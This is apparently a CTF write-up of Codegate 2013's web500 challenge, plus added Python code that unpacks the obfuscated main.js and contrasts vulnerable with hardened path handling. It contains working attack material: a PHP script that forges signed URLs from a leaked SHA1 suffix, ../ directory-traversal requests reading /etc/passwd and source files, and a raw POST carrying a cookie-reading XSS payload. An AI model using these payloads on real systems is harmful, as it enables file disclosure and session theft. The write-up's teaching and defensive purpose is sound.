
Codegate 2013 CTF write-up, web500

Web 500

It was such a fantastic challenge and I was absorbed in it. When you enter the challenge, a message says that the site may only be visited from a mobile device, so I installed a user-agent switcher add-on for Mozilla Firefox. Visiting the site with a spoofed mobile user-agent, I found something interesting:

http://58.229.122.16:33445/site/main.js
var _0x5291=["\x3D\x73\x54\x4B\x70\x55\x47\x63\x68\x4E\x32\x63\x6C\x39\x46\x4B\x6C\x42\x58\x59\x6A\x4E\x58\x5A\x75\x56\x48\x4B\x6C\x52\x58\x61\x79\x64\x6E\x4C\x30\x35\x57\x5A\x74\x56\x33\x59\x76\x52\x32\x4F\x70\x6B\x55\x53\x77\x38\x46\x4B\x6B\x78\x57\x61\x6F\x4E\x45\x5A\x75\x56\x47\x63\x77\x46\x6D\x4C\x77\x77\x57\x4D\x66\x70\x77\x4F\x64\x42\x7A\x57\x70\x63\x43\x5A\x68\x56\x47\x61\x6E\x67\x53\x5A\x74\x46\x6D\x54\x6E\x46\x47\x56\x35\x4A\x30\x63\x30\x35\x57\x5A\x74\x56\x47\x62\x46\x52\x58\x5A\x6E\x35\x43\x64\x75\x56\x57\x62\x31\x4E\x32\x62\x6B\x42\x53\x50\x67\x41\x44\x62\x78\x38\x46\x49\x79\x46\x6D\x64\x4B\x73\x54\x4B\x4D\x4A\x56\x56\x75\x51\x6E\x62\x6C\x31\x57\x64\x6A\x39\x47\x5A\x6F\x51\x6E\x62\x6C\x35\x32\x62\x77\x31\x32\x62\x44\x6C\x6B\x55\x56\x56\x47\x5A\x76\x4E\x6D\x62\x6C\x74\x79\x4A\x39\x77\x6D\x63\x31\x5A\x79\x4A\x72\x6B\x69\x63\x6C\x4A\x6E\x63\x6C\x5A\x57\x5A\x79\x35\x43\x64\x75\x56\x57\x62\x31\x4E\x32\x62\x6B\x68\x43\x64\x75\x56\x6D\x62\x76\x42\x58\x62\x76\x4E\x55\x53\x53\x56\x56\x5A\x6B\x39\x32\x59\x75\x56\x32\x4B\x6E\x30\x6A\x5A\x6C\x4A\x6E\x4A\x6E\x73\x79\x4A\x72\x39\x57\x50\x6A\x4A\x33\x63\x30\x56\x32\x5A\x2F\x38\x53\x62\x76\x4E\x6D\x4C\x30\x42\x58\x61\x79\x4E\x32\x63\x68\x5A\x58\x59\x71\x4A\x33\x62\x30\x46\x32\x59\x7A\x56\x6E\x5A\x69\x39\x6D\x4C\x70\x42\x58\x59\x76\x38\x69\x4F\x77\x52\x48\x64\x6F\x64\x43\x49\x39\x41\x79\x59\x79\x4E\x6E\x4C\x4A\x6C\x45\x4D\x66\x70\x77\x4F\x70\x63\x43\x64\x77\x6C\x6D\x63\x6A\x4E\x33\x4A\x6F\x51\x6E\x62\x6C\x31\x57\x5A\x73\x56\x55\x5A\x30\x46\x57\x5A\x79\x4E\x6D\x4C\x30\x35\x57\x5A\x74\x56\x33\x59\x76\x52\x47\x49\x39\x41\x53\x53\x4A\x42\x7A\x58\x67\x49\x58\x59\x32\x74\x7A\x4A\x46\x4E\x54\x4A\x30\x42\x58\x61\x79\x4E\x32\x63\x76\x4D\x30\x4D\x6C\x51\x30\x4E\x6C\x45\x45\x4D\x6C\x49\x30\x4D\x6C\x6B\x6A\x4D\x6C\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x73\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x67\x6B\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x49\x54\x4A\x79\x49\x54\x4A\x
72\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6F\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x64\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x41\x6A\x4D\x6C\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x6B\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x49\x54\x4A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6A\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x53\x51\x79\x49\x54\x4A\x72\x55\x32\x5A\x68\x42\x48\x4F\x79\x55\x53\x4D\x42\x68\x30\x55\x6A\x78\x57\x59\x6A\x74\x69\x4D\x79\x55\x43\x52\x7A\x55\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x7A\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x4E\x79\x55\x69\x4D\x79\x55\x79\x4B\x6C\x64\x57\x59\x77\x74\x69\x4D\x79\x55\x43\x52\x7A\x55\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x52\x7A\x55\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x41\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x75\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x65\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6B\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x6B\x6D\x4D\x79\x55\x43\x52\x7A\x55\x69\x5A\x6C\x4A\x48\x61\x75\x34\x32\x62\x70\x52\x58\x59\x6A\x39\x47\x62\x75\x63\x33\x62\x6B\x35\x57\x61\x33\x6C\x44\x4D\x6C\x45\x45\x4D\x6C\x51\x30\x4E\x6C\x6B\x44\x4D\x6C\x45\x45\x4D\x6C\x49\x30\x4D\x6C\x73\x57\x59\x6C\x4A\x6E\x59\x77\x49\x54\x4A\x43\x4E\x54\x4A\x79\x49\x54\x4A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x77\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x74\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x64\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x67\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x75\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x5A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x45\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x58\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x51\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x
6C\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x5A\x79\x49\x54\x4A\x45\x4E\x54\x4A\x6C\x64\x57\x59\x77\x42\x6A\x4D\x6C\x45\x30\x4D\x6C\x41\x6A\x4D\x6C\x4D\x44\x4D\x79\x55\x53\x5A\x7A\x46\x32\x59\x35\x41\x54\x4A\x35\x41\x54\x4A\x42\x42\x54\x4A\x43\x4E\x54\x4A\x72\x46\x57\x5A\x79\x4A\x47\x4D\x79\x55\x69\x51\x7A\x55\x69\x4D\x79\x55\x43\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x30\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x34\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6C\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x59\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6B\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x49\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x6B\x6D\x4D\x79\x55\x43\x52\x7A\x55\x53\x5A\x6E\x46\x47\x63\x77\x49\x54\x4A\x42\x4E\x54\x4A\x77\x49\x54\x4A\x79\x41\x6A\x4D\x6C\x55\x32\x63\x68\x4E\x57\x4F\x77\x55\x53\x4F\x77\x55\x53\x51\x77\x55\x69\x51\x7A\x55\x79\x61\x68\x56\x6D\x63\x69\x42\x6A\x4D\x6C\x49\x30\x4D\x6C\x49\x6A\x4D\x6C\x77\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x74\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x64\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x67\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x75\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x53\x5A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x30\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x76\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x45\x4E\x54\x4A\x6C\x64\x57\x59\x77\x42\x6A\x4D\x6C\x45\x30\x4D\x6C\x41\x6A\x4D\x6C\x45\x44\x4D\x79\x55\x53\x5A\x7A\x46\x32\x59\x35\x41\x54\x4A\x35\x41\x54\x4A\x42\x42\x54\x4A\x43\x64\x54\x4A\x77\x49\x54\x4A\x35\x49\x54\x4A\x77\x68\x6A\x4D\x6C\x41\x6A\x4D\x6C\x67\x32\x59\x30\x6C\x32\x64\x7A\x6C\x44\x4D\x6C\x45\x45\x4D\x6C\x49\x30\x4D\x6C\x49\x6A\x4D\x6C\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x30\x6D\x4D\x79\x55\x79\x4B\x
79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x34\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6C\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x53\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x38\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6F\x4A\x6A\x4D\x6C\x41\x6A\x4D\x6C\x51\x30\x4D\x6C\x41\x6A\x4D\x6C\x55\x32\x5A\x68\x42\x48\x4D\x79\x55\x69\x63\x68\x5A\x58\x4F\x77\x55\x53\x51\x77\x55\x69\x51\x33\x55\x53\x4F\x79\x55\x43\x63\x34\x49\x54\x4A\x6C\x64\x57\x59\x77\x39\x46\x5A\x68\x39\x47\x62\x77\x49\x54\x4A\x75\x39\x57\x61\x30\x4E\x6D\x62\x31\x5A\x57\x52\x7A\x55\x43\x64\x77\x6C\x6D\x63\x6A\x4E\x33\x51\x7A\x55\x79\x4A\x39\x55\x47\x63\x68\x4E\x32\x63\x6C\x39\x46\x49\x79\x46\x6D\x64","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];var lO1=_0x5291[0];var _0x84de=[_0x5291[1],_0x5291[2],_0x5291[3],_0x5291[4],_0x5291[5],_0x5291[6]];function OO1(_0xc565x4){var _0xc565x5=_0x84de[0];var _0xc565x6,_0xc565x7,_0xc565x8,_0xc565x9,_0xc565xa,_0xc565xb,_0xc565xc,_0xc565xd,_0xc565xe=0,_0xc565xf=_0x84de[1];do{_0xc565x9=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xa=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xb=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xc=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xd=_0xc565x9<<18|_0xc565xa<<12|_0xc565xb<<6|_0xc565xc;_0xc565x6=_0xc565xd>>16&0xff;_0xc565x7=_0xc565xd>>8&0xff;_0xc565x8=_0xc565xd&0xff;if(_0xc565xb==64){_0xc565xf+=String[_0x84de[4]](_0xc565x6);} else {if(_0xc565xc==64){_0xc565xf+=String[_0x84de[4]](_0xc565x6,_0xc565x7);} else 
{_0xc565xf+=String[_0x84de[4]](_0xc565x6,_0xc565x7,_0xc565x8);} ;} ;} while(_0xc565xe<_0xc565x4[_0x84de[5]]);;return _0xc565xf;} ;function _0OO(_0xc565x11){var _0xc565x12=_0x84de[1],_0xc565xe=0;for(_0xc565xe=_0xc565x11[_0x84de[5]]-1;_0xc565xe>=0;_0xc565xe--){_0xc565x12+=_0xc565x11[_0x84de[2]](_0xc565xe);} ;return _0xc565x12;} ;eval(OO1(_0OO(lO1)));

It was obfuscated, but easy to turn back into clear text:

// Unpacker warning: be careful when using myobfuscate.com for your projects:
// scripts obfuscated by the free online version may call back home.
//
function load_page(p) {
    var page = "h" + "o" + "m" + "e" + "." + "h" + "t" + "m" + "l" + "";
    switch (p) {
        case 1:
            page = "h" + "o" + "m" + "e" + "." + "h" + "t" + "m" + "l";
            break;
        case 2:
            page = "i" + "n" + "t" + "r" + "o" + "d" + "u" + "c" + "e" + "." + "h" + "t" + "m" + "l";
            break;
        case 3:
            page = "g" + "e" + "t" + "_" + "t" + "a" + "g" + "." + "h" + "t" + "m" + "l" + "";
            break;
    }
    window.location.href = "i" + "n" + "d" + "e" + "x" + "." + "p" + "h" + "p" + "?" + "p" + "=" + page + "&" + "s" + "=" + calcSHA1(page + "A" + "c" + "e" + " " + "i" + "n" + " " + "t" + "h" + "e" + " " + "H" + "o" + "l" + "e");
}
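How the packer works, and how to undo it without running the script, as an added example written for this write-up (not code from the original page or from the challenge): main.js only ever calls eval(OO1(_0OO(lO1))), where _0OO reverses a string and OO1 is an ordinary base64 decoder over the standard alphabet kept in the string table. The unpacker below parses the hex-escaped string table, reverses its first entry and base64-decodes it. The embedded main.js-style sample is constructed here with a short payload, since the real blob is several kilobytes.

```python
import base64
import re

# Added example: a static unpacker for the scheme main.js uses, written for this
# write-up and not part of the challenge. The packed script is eval(OO1(_0OO(lO1))),
# where _0OO reverses a string and OO1 is a plain base64 decoder, so the payload can
# be recovered without executing it.

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
STRING_TABLE = re.compile(r'var\s+_0x[0-9a-fA-F]+\s*=\s*\[([^\]]*)\]')


def unescape_hex(s: str) -> str:
    """Turn JS "\\x41\\x42" escapes back into characters."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def extract_string_table(src: str) -> list[str]:
    """Pull the string array the packer declares first (var _0x5291=[...] in main.js)."""
    m = STRING_TABLE.search(src)
    if not m:
        raise ValueError("no packer string table found")
    return [unescape_hex(s) for s in re.findall(r'"([^"]*)"', m.group(1))]


def decode_payload(packed: str) -> str:
    """Undo _0OO (reverse), fix up padding, then undo OO1 (base64 decode)."""
    b64 = packed[::-1]
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def unpack(src: str) -> str:
    """Statically evaluate eval(OO1(_0OO(lO1))) for a main.js-style source."""
    table = extract_string_table(src)
    return decode_payload(table[0])   # lO1 = _0x5291[0]


# Constructed sample in the same shape as main.js; the payload is deliberately short.
def _pack(js: str) -> str:
    return base64.b64encode(js.encode()).decode()[::-1]


def _hexescape(s: str) -> str:
    return "".join(f"\\x{ord(c):02X}" for c in s)


SAMPLE_JS = "function load_page(p){window.location.href='index.php?p='+p;}"
SAMPLE_MAIN_JS = (
    'var _0x5291=["' + _hexescape(_pack(SAMPLE_JS)) + '","'
    + _hexescape("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")
    + '","","' + _hexescape("charAt") + '","' + _hexescape("indexOf") + '","'
    + _hexescape("fromCharCode") + '","' + _hexescape("length") + '"];'
    'var lO1=_0x5291[0];eval(OO1(_0OO(lO1)));'
)

if __name__ == "__main__":
    print(unpack(SAMPLE_MAIN_JS))
```

Running it on the real main.js only needs the file contents passed to unpack(). The decode never executes the payload, which matters when a packed script may phone home, as the unpacker warning in the clear-text listing above notes.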

The last line gives away how the URLs are signed: p is the page name and s is sha1(page . 'Ace in the Hole'). The "secret" suffix is delivered to every client inside main.js, so the signature only stops casual tampering; anyone who has read the script can compute a valid s for any p. The URLs followed this pattern:

http://58.229.122.16:33445/site/index.php?p=[page]&s=[hash]

I wrote a short PHP script that produces a correctly signed URL for any page name:

<?php
// Usage: php <this file> <page>
// Builds a signed URL for any p= value using the suffix leaked in main.js.
if ($argc < 2) {
    fwrite(STDERR, "usage: php {$argv[0]} <page>\n");
    exit(1);
}
$str = $argv[1];
echo "\nSimple SHA1 creator, URL:\n\n";
echo "http://58.229.122.16:33445/site/index.php?p=".$str."&s=".sha1($str.'Ace in the Hole');
echo "\n";
?>

With it I generated the following links to read the source files. Since p is used as a file path on the server, directory traversal works as well:

index.php:
/site/index.php?p=index.php&s=b7fdc6dd3dd295755f8f3d95cd3e2d7ae93db333

simulator.php:
/site/index.php?p=simulator.php&s=f1276925f4cd545e6d260fecae13a49bad0d44ca

simulator_ok.php:
/site/index.php?p=simulator_ok.php&s=7380158ad4653ae13076cabbffd99f81985062c4

/etc/passwd:
/site/index.php?p=../../../../../../../etc/passwd&s=05d0d30187b2b3bc815896a69669f5a09e99e4af

Apache config (this path has an issue: on Debian/Ubuntu the file is /etc/apache2/apache2.conf):
/site/index.php?p=../../../../../../../etc/apache2/apache.conf&s=8f5eb80a435581528c1377e7fb406b9875be3c29

simulator_ok.php was the most important of these. It contained:

$db = sqlite_open("/var/game_db/gamesim_".$_SESSION['scrap'].".db");

That gave me the database path, and simulator.php showed how the session value is filled: straight from the POST parameter, with no validation:

if (isset($_POST['name'])) $_SESSION['scrap']=$_POST['name'];

I registered a character named "test" and then read the resulting database through the same traversal:

/index.php?p=../../../../../../../var/game_db/gamesim_test.db&s=5ba96b8bc3bcf78fad0e24286f15606235a0adaf

That led me to the flag. I also found a useful XSS in the same name parameter:

POST /site/simulator.php HTTP/1.1
Host: 58.229.122.16:33445
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://58.229.122.16:33445/site/index.php?p=get_tag.html&s=cc8781cbe7cc10799a1de386aea7344216b39ca4
Cookie: PHPSESSID=cmlmesbsf4nem7rriqvrpcmlq5
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

name="><script>document.write(document.cookie)</script>
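The three weaknesses above, the forgeable s=, the p= traversal into /var/game_db and /etc, and the reflected character name, in one added Python reconstruction. This is written for this edit and is not code recovered from the server; the write-up never shows index.php's own logic. The web root, the database directory layout beyond what simulator_ok.php reveals, and the allow-list of the three pages load_page() can produce are assumptions. The "vulnerable" functions model the behaviour observed in the write-up; the hardened ones show the checks that close each hole.

```python
import hashlib
import hmac
import html
import os
import re
from typing import Optional

# Added reconstruction for this write-up, not code recovered from the challenge server.
# Assumptions: the site lives under WEB_ROOT and index.php joins p= to it; game
# databases live in DB_DIR as simulator_ok.php shows; the allow-list is the three
# pages load_page() in main.js can produce.
WEB_ROOT = "/var/www/site"
DB_DIR = "/var/game_db"
PUBLIC_SUFFIX = "Ace in the Hole"          # shipped to every client in main.js
ALLOWED_PAGES = frozenset({"home.html", "introduce.html", "get_tag.html"})
NAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def sign_public(page: str) -> str:
    """The challenge's s= value: sha1(p . 'Ace in the Hole'). Anyone who read main.js can forge it."""
    return hashlib.sha1((page + PUBLIC_SUFFIX).encode()).hexdigest()


def resolve_vulnerable(p: str, s: str) -> Optional[str]:
    """Assumed shape of the original check. A matching s only proves the caller knows the
    public suffix, and p is joined to the web root unchanged, so '../' walks out of it."""
    if s != sign_public(p):
        return None
    return os.path.normpath(os.path.join(WEB_ROOT, p))


def resolve_hardened(p: str) -> str:
    """Allow-list the page, then confirm the resolved path still sits under WEB_ROOT.
    The containment check is redundant with a fixed allow-list; it stays as a guard
    for the day the list becomes configurable."""
    if p not in ALLOWED_PAGES:
        raise PermissionError(f"page not allowed: {p!r}")
    path = os.path.normpath(os.path.join(WEB_ROOT, p))
    if os.path.commonpath([path, WEB_ROOT]) != WEB_ROOT:
        raise PermissionError(f"path escapes web root: {p!r}")
    return path


def sign_server(page: str, key: bytes) -> str:
    """If a per-link token is still wanted, derive it with a key that never leaves the server."""
    return hmac.new(key, page.encode(), hashlib.sha256).hexdigest()


def verify_server(page: str, token: str, key: bytes) -> bool:
    return hmac.compare_digest(sign_server(page, key), token)


def db_path_vulnerable(name: str) -> str:
    """simulator_ok.php pattern: the POSTed name goes straight into the SQLite path."""
    return os.path.normpath(os.path.join(DB_DIR, f"gamesim_{name}.db"))


def db_path_hardened(name: str) -> str:
    """Reject anything outside a strict character class before it touches a path."""
    if not NAME_RE.fullmatch(name):
        raise ValueError(f"invalid character name: {name!r}")
    return os.path.join(DB_DIR, f"gamesim_{name}.db")


def render_name_attr(name: str) -> str:
    """Attribute-context encoding for the reflected name; the write-up's payload starts
    with '">' precisely to close an unescaped attribute."""
    return f'<input type="text" name="name" value="{html.escape(name, quote=True)}">'


if __name__ == "__main__":
    traversal = "../../../../../../../etc/passwd"
    print(resolve_vulnerable(traversal, sign_public(traversal)))   # /etc/passwd
    try:
        resolve_hardened(traversal)
    except PermissionError as e:
        print("hardened:", e)
    print(db_path_vulnerable("test"))
    print(render_name_attr('"><script>document.write(document.cookie)</script>'))
```

The fix that matters is the allow-list: a signature computed from a value shipped to the client is not authentication, and even a properly keyed HMAC would still let a user fetch any file the server was willing to name. Validating the character name closes both the database path and the XSS at once; the attribute escaping stays because output encoding should not depend on input validation holding.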

And the server's /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
blueh4g:x:1000:1000:blueh4g,,,:/home/blueh4g:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

Finding the other paths took me nearly half an hour. Stay safe!

